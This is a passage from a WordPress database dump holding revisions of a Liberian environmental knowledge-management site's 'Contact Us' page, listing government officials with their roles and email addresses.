height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:25:31','2021-03-29 09:25:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3639,42,'2021-03-29 09:25:31','2021-03-29 09:25:31','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:25:31','2021-03-29 09:25:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3640,42,'2021-03-29 09:25:32','2021-03-29 09:25:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img 